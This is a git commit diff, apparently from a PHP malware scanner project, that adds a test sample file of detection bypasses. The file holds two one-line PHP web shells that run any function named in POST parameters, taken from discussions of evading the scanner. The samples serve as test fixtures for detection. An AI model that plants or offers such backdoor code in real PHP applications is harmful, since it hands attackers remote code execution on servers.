diff options
| author | Mathieu Deous | 2022-05-02 20:18:23 +0200 |
|---|---|---|
| committer | GitHub | 2022-05-02 20:18:23 +0200 |
| commit | 48936efa96ae17295be4e0a71be3294f0ec6aef8 (patch) | |
| tree | f4e69551f1368aa048edf46b7b061600f3668329 /data/samples/artificial/bypasses.php | |
| parent | bbc738e16f8b637afde58d65196374af98a5e0e2 (diff) | |
Make application go-install-able and create a docker image
Diffstat (limited to 'data/samples/artificial/bypasses.php')
| -rw-r--r-- | data/samples/artificial/bypasses.php | 7 |
1 files changed, 7 insertions, 0 deletions
diff --git a/data/samples/artificial/bypasses.php b/data/samples/artificial/bypasses.php new file mode 100644 index 0000000..9d849a4 --- /dev/null +++ b/data/samples/artificial/bypasses.php | |||
| @@ -0,0 +1,7 @@ | |||
| 1 | <?php | ||
| 2 | |||
| 3 | // https://rstforums.com/forum/topic/98500-php-malware-finder/?do=findComment&comment=615687 | ||
| 4 | print_r(call_user_func_array($_POST['functie'], array($_POST['argv']))); | ||
| 5 | |||
| 6 | // https://github.com/nbs-system/php-malware-finder/commit/47d86bf92eb15fe65dd4efbc04d0004856e88ddd#commitcomment-16355734 | ||
| 7 | print_r($_POST['funct']($_POST['argv'])); | ||
